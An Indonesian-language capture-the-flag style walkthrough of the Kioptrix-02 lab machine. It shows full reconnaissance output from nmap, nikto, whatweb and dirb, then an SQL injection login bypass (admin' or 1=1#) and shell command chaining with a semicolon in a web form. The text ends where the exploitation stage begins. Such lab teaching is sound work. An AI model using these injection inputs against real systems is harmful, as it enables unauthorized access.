The Kioptrix-02 Story: Never Trust, Always Verify

Serial Kioptrix yang ditulis oleh loneferret terus berlanjut pada seri kedua. Pada seri kali ini, pelajaran penting yang harus diingat dalam keamanan informasi adalah jangan percaya pada siapa pun pengguna aplikasi web anda. Secara singkat prinsip ini berbunyi “Never Trust Always Verify”. Mari kita ikuti perjalanan singkat pencarian kerentanan pada mesin Kioptrix-02 ini. Serupa dengan pendekatan pada kisah sebelumnya, kisah ini pun dibagi dalam tiga tahap, yaitu: Tahap Scanning dan Enumeration, Tahap Mapping Attack Surface serta Tahap Exploitation dan Post Exploitation.

Melalui kisah ini diharapkan segenap Penyelenggara Sistem Elektronik untuk senantiasa mewaspadai kerentanan pada sistemnya. Hal ini mengingat Pasal 11 pada Peraturan Pemerintah No. 71 Tahun 2019 tentang Penyelenggaraan Sistem dan Transaksi Elektronik telah mengamanatkan agar mampu menjamin keamanan pada Sistem Elektronik yang dikelolanya.

Tahap Pertama: Scanning dan Enumeration

Perangkat yang kita gunakan pada tahap pengumpulan informasi ini adalah nmap, ia adalah alat yang jadi populer sejak diangkat dalam film Hollywood berjudul The Matrix. Berdasarkan informasi yang dihimpun oleh alat ini, bahwa mesin Kioptrix-02 memiliki fungsi utama sebagai web server dimana ia menggunakan Apache (2.0.52) dan MySQL (versi belum diketahui) sebagai databasenya. Sedangkan sistem operasi yang digunakan adalah Centos (versi belum diketahui). Berikut ini adalah informasi yang dikumpulkan oleh ketiga perangkat tersebut:

root@kali2:~# nmap -p- -A 192.168.216.148
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-18 20:06 PDT
Nmap scan report for 192.168.216.148 (192.168.216.148)
Host is up (0.00073s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            652/udp  status
|_  100024  1            655/tcp  status
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-19T14:07:01+00:00; +10h59m40s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
655/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:3F:59:E2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 10h59m39s, deviation: 0s, median: 10h59m39s

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.216.148 (192.168.216.148)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.59 seconds

Informasi yang dihumpun sudah cukup, namun untuk layanan HTTP dibutuhkan pengumpulan informasi lebih lanjut. Untuk itu, maka kita akan menggunakan perangkat nikto, whatweb dan dirb. Berdasarkan informasi yang dihimpun oleh ketiga alat tersebut, ada beberapa informasi tambahan yaitu bahasa yang digunakan adalah PHP (versi 4.3.9) dan beberapa folder yang terpublikasi ke internet yaitu folder manual.

root@kali2:~# nikto -h http://192.168.216.148/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.216.148
+ Target Hostname:    192.168.216.148
+ Target Port:        80
+ Start Time:         2020-04-18 20:21:45 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 10:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-04-18 20:22:30 (GMT-7) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali2:~# whatweb http://192.168.216.148 -v
WhatWeb report for http://192.168.216.148
Status    : 200 OK
Title     : <None>
IP        : 192.168.216.148
Country   : RESERVED, ZZ

Summary   : HTTPServer[CentOS][Apache/2.0.52 (CentOS)], X-Powered-By[PHP/4.3.9], Apache[2.0.52], PasswordField[psw], PHP[4.3.9]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 2.0.52 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	OS           : CentOS
	String       : Apache/2.0.52 (CentOS) (from server string)

[ PHP ]
	PHP is a widely-used general-purpose scripting language 
	that is especially suited for Web development and can be 
	embedded into HTML. This plugin identifies PHP errors, 
	modules and versions and extracts the local file path and 
	username if present. 

	Version      : 4.3.9
	Google Dorks: (2)
	Website     : http://www.php.net/

[ PasswordField ]
	find password fields 

	String       : psw (from field name)

[ X-Powered-By ]
	X-Powered-By HTTP header 

	String       : PHP/4.3.9 (from x-powered-by string)

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Sun, 19 Apr 2020 15:20:13 GMT
	Server: Apache/2.0.52 (CentOS)
	X-Powered-By: PHP/4.3.9
	Content-Length: 667
	Connection: close
	Content-Type: text/html; charset=UTF-8

root@kali2:~/Documents# dirb http://192.168.216.148

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Apr 18 21:12:36 2020
URL_BASE: http://192.168.216.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.216.148/ ----
+ http://192.168.216.148/cgi-bin/ (CODE:403|SIZE:291)                                               
+ http://192.168.216.148/index.php (CODE:200|SIZE:667)                                              
==> DIRECTORY: http://192.168.216.148/manual/                                                       
+ http://192.168.216.148/usage (CODE:403|SIZE:288)                                                  
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ ----
==> DIRECTORY: http://192.168.216.148/manual/de/                                                    
==> DIRECTORY: http://192.168.216.148/manual/developer/                                             
==> DIRECTORY: http://192.168.216.148/manual/en/                                                    
==> DIRECTORY: http://192.168.216.148/manual/faq/                                                   
==> DIRECTORY: http://192.168.216.148/manual/fr/                                                    
==> DIRECTORY: http://192.168.216.148/manual/howto/                                                 
==> DIRECTORY: http://192.168.216.148/manual/images/                                                
+ http://192.168.216.148/manual/index.html (CODE:200|SIZE:7234)                                     
==> DIRECTORY: http://192.168.216.148/manual/ja/                                                    
==> DIRECTORY: http://192.168.216.148/manual/ko/                                                    
+ http://192.168.216.148/manual/LICENSE (CODE:200|SIZE:11358)                                       
==> DIRECTORY: http://192.168.216.148/manual/misc/                                                  
==> DIRECTORY: http://192.168.216.148/manual/mod/                                                   
==> DIRECTORY: http://192.168.216.148/manual/programs/                                              
==> DIRECTORY: http://192.168.216.148/manual/ru/                                                    
==> DIRECTORY: http://192.168.216.148/manual/ssl/                                                   
==> DIRECTORY: http://192.168.216.148/manual/style/                                                 
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/ ----
+ http://192.168.216.148/manual/de/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/developer/                                          
+ http://192.168.216.148/manual/de/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/faq/                                                
+ http://192.168.216.148/manual/de/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/de/images/                                             
+ http://192.168.216.148/manual/de/index.html (CODE:200|SIZE:7317)                                  
+ http://192.168.216.148/manual/de/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/de/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/de/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/de/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/de/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/de/programs/                                           
+ http://192.168.216.148/manual/de/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/de/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/de/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/developer/ ----
+ http://192.168.216.148/manual/developer/index.html (CODE:200|SIZE:4770)                           
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/ ----
+ http://192.168.216.148/manual/en/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/developer/                                          
+ http://192.168.216.148/manual/en/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/faq/                                                
+ http://192.168.216.148/manual/en/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/en/images/                                             
+ http://192.168.216.148/manual/en/index.html (CODE:200|SIZE:7234)                                  
+ http://192.168.216.148/manual/en/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/en/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/en/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/en/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/en/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/en/programs/                                           
+ http://192.168.216.148/manual/en/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/en/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/en/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/faq/ ----
+ http://192.168.216.148/manual/faq/index.html (CODE:200|SIZE:3564)                                 
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/ ----
+ http://192.168.216.148/manual/fr/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/developer/                                          
+ http://192.168.216.148/manual/fr/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/faq/                                                
+ http://192.168.216.148/manual/fr/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/fr/images/                                             
+ http://192.168.216.148/manual/fr/index.html (CODE:200|SIZE:7234)                                  
+ http://192.168.216.148/manual/fr/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/fr/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/fr/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/fr/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/fr/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/fr/programs/                                           
+ http://192.168.216.148/manual/fr/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/fr/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/fr/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/howto/ ----
+ http://192.168.216.148/manual/howto/index.html (CODE:200|SIZE:5685)                               
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/ ----
+ http://192.168.216.148/manual/ja/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/developer/                                          
+ http://192.168.216.148/manual/ja/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/faq/                                                
+ http://192.168.216.148/manual/ja/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/ja/images/                                             
+ http://192.168.216.148/manual/ja/index.html (CODE:200|SIZE:7227)                                  
+ http://192.168.216.148/manual/ja/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ja/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ja/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/ja/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/ja/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/ja/programs/                                           
+ http://192.168.216.148/manual/ja/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ja/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/ja/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/ ----
+ http://192.168.216.148/manual/ko/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/developer/                                          
+ http://192.168.216.148/manual/ko/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/faq/                                                
+ http://192.168.216.148/manual/ko/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/ko/images/                                             
+ http://192.168.216.148/manual/ko/index.html (CODE:200|SIZE:6954)                                  
+ http://192.168.216.148/manual/ko/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ko/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ko/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/ko/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/ko/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/ko/programs/                                           
+ http://192.168.216.148/manual/ko/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ko/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/ko/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/misc/ ----
+ http://192.168.216.148/manual/misc/index.html (CODE:200|SIZE:5491)                                
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/mod/ ----
+ http://192.168.216.148/manual/mod/index.html (CODE:200|SIZE:13437)                                
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/programs/ ----
+ http://192.168.216.148/manual/programs/index.html (CODE:200|SIZE:4664)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/ ----
^?                                                                                                   ^?                                                                                                   + http://192.168.216.148/manual/ru/de (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ru/developer/                                          
+ http://192.168.216.148/manual/ru/en (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ru/faq/                                                
+ http://192.168.216.148/manual/ru/fr (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ru/howto/                                              
==> DIRECTORY: http://192.168.216.148/manual/ru/images/                                             
+ http://192.168.216.148/manual/ru/index.html (CODE:200|SIZE:7277)                                  
+ http://192.168.216.148/manual/ru/ja (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ru/ko (CODE:301|SIZE:321)                                           
+ http://192.168.216.148/manual/ru/LICENSE (CODE:200|SIZE:11358)                                    
==> DIRECTORY: http://192.168.216.148/manual/ru/misc/                                               
==> DIRECTORY: http://192.168.216.148/manual/ru/mod/                                                
==> DIRECTORY: http://192.168.216.148/manual/ru/programs/                                           
+ http://192.168.216.148/manual/ru/ru (CODE:301|SIZE:321)                                           
==> DIRECTORY: http://192.168.216.148/manual/ru/ssl/                                                
==> DIRECTORY: http://192.168.216.148/manual/ru/style/                                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ssl/ ----
+ http://192.168.216.148/manual/ssl/index.html (CODE:200|SIZE:3988)                                 
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/developer/ ----
+ http://192.168.216.148/manual/de/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/faq/ ----
+ http://192.168.216.148/manual/de/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/howto/ ----
+ http://192.168.216.148/manual/de/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/misc/ ----
+ http://192.168.216.148/manual/de/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/mod/ ----
+ http://192.168.216.148/manual/de/mod/index.html (CODE:200|SIZE:13561)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/programs/ ----
+ http://192.168.216.148/manual/de/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/ssl/ ----
+ http://192.168.216.148/manual/de/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/developer/ ----
+ http://192.168.216.148/manual/en/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/faq/ ----
+ http://192.168.216.148/manual/en/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/howto/ ----
+ http://192.168.216.148/manual/en/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/misc/ ----
+ http://192.168.216.148/manual/en/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/mod/ ----
+ http://192.168.216.148/manual/en/mod/index.html (CODE:200|SIZE:13437)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/programs/ ----
+ http://192.168.216.148/manual/en/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/ssl/ ----
+ http://192.168.216.148/manual/en/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/developer/ ----
+ http://192.168.216.148/manual/fr/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/faq/ ----
+ http://192.168.216.148/manual/fr/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/howto/ ----
+ http://192.168.216.148/manual/fr/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/misc/ ----
+ http://192.168.216.148/manual/fr/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/mod/ ----
+ http://192.168.216.148/manual/fr/mod/index.html (CODE:200|SIZE:13437)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/programs/ ----
+ http://192.168.216.148/manual/fr/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/ssl/ ----
+ http://192.168.216.148/manual/fr/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/developer/ ----
+ http://192.168.216.148/manual/ja/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/faq/ ----
+ http://192.168.216.148/manual/ja/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/howto/ ----
+ http://192.168.216.148/manual/ja/howto/index.html (CODE:200|SIZE:5607)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/misc/ ----
+ http://192.168.216.148/manual/ja/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/mod/ ----
+ http://192.168.216.148/manual/ja/mod/index.html (CODE:200|SIZE:13298)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/programs/ ----
+ http://192.168.216.148/manual/ja/programs/index.html (CODE:200|SIZE:4664)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/ssl/ ----
+ http://192.168.216.148/manual/ja/ssl/index.html (CODE:200|SIZE:3957)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/developer/ ----
+ http://192.168.216.148/manual/ko/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/faq/ ----
+ http://192.168.216.148/manual/ko/faq/index.html (CODE:200|SIZE:3371)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/howto/ ----
+ http://192.168.216.148/manual/ko/howto/index.html (CODE:200|SIZE:5299)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/misc/ ----
+ http://192.168.216.148/manual/ko/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/mod/ ----
+ http://192.168.216.148/manual/ko/mod/index.html (CODE:200|SIZE:12795)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/programs/ ----
+ http://192.168.216.148/manual/ko/programs/index.html (CODE:200|SIZE:4543)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/ssl/ ----
+ http://192.168.216.148/manual/ko/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/developer/ ----
+ http://192.168.216.148/manual/ru/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/faq/ ----
+ http://192.168.216.148/manual/ru/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/howto/ ----
+ http://192.168.216.148/manual/ru/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/misc/ ----
+ http://192.168.216.148/manual/ru/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/mod/ ----
+ http://192.168.216.148/manual/ru/mod/index.html (CODE:200|SIZE:13437)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/programs/ ----
+ http://192.168.216.148/manual/ru/programs/index.html (CODE:200|SIZE:5016)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/ssl/ ----
+ http://192.168.216.148/manual/ru/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Apr 18 21:21:59 2020
DOWNLOADED: 262884 - FOUND: 102

Tidak ada yang menarik pada folder manual, setelah ditelusuri isinya tak lebih dari manual penggunaan Apache Web Server. File yang menarik untuk ditelusuri adalah index.php berupa form login, sebagaimana gambar 1 berikut ini:

Tahap Kedua : Mapping Attack Surface

Berdasarkan informasi yang dihimpun pada Tahap terdahulu, dapat dipetakan potensi serangan yang dapat dilakukan (lihat Gambar 2) pada tiga layanan yaitu SSH, HTTP dan ipp. Untuk layanan SSH tidak ditemukan adanya potensi Remote Code Execution (RCE) karena versi 3.9p1 pada OpenSSH tidak ditemukan kerentanan Buffer Over Flow, demikian juga untuk layanan ipp (CUPS 1.1). Sedangkan potensi serangan brute force pada layanan SSH tidak dapat dilakukan karena tidak ditemukan adanya user account yang valid.

Dengan demikian potensi serangan yang valid kini adalah kerentanan injection, yaitu SQL Injection. Setelah melakukan percobaan beberapa kali, maka input dengan admin’ or 1=1# pada kolom Username ternyata dapat mem-bypass form login pada mesin Kiptrix-02, sebagaimana dua gambar berikut ini:

Gambar 3. Melakukan input admin’ or 1=1# untuk melakukan verifikasi atas peluang serangan

Gambar 4. Hasil verifikasi terbukti bahwa kolom Username
adalah sasaran serangan potensial

Apabila form tersebut dianalisis lebih lanjut, dapat disimpulkan bahwa ia dapat melakukan eksekusi beberapa perintah pada sistem operasi secara sekaligus dengan cara menggabungkan beberapa perintah dengan simbol “;” atau titik koma. Hal ini merupakan feature dari sistem operasi Linux. Hal tersebut dapat dilihat pada dua gambar berikut ini:

Gambar 5. Menggunakan perintah ping 127.0.0.1 dan uname -a pada form

Gambar 6. Hasil eksekusi perintah ping dan uname

Tahap Ketiga : Exploitation dan Post-Exploitation

Berdasarkan analisis pada tahap terdahulu terlihat bahwa kolom Username pada file index.php memiliki kerentanan yang valid dan sangat potensial sebagai celah untuk menguasai sistem secara keseluruhan. Untuk itu pada Tahap Exploitation dan Post-Exploitation ini maka serangan siber akan difokuskan pada kerentanan tersebut.

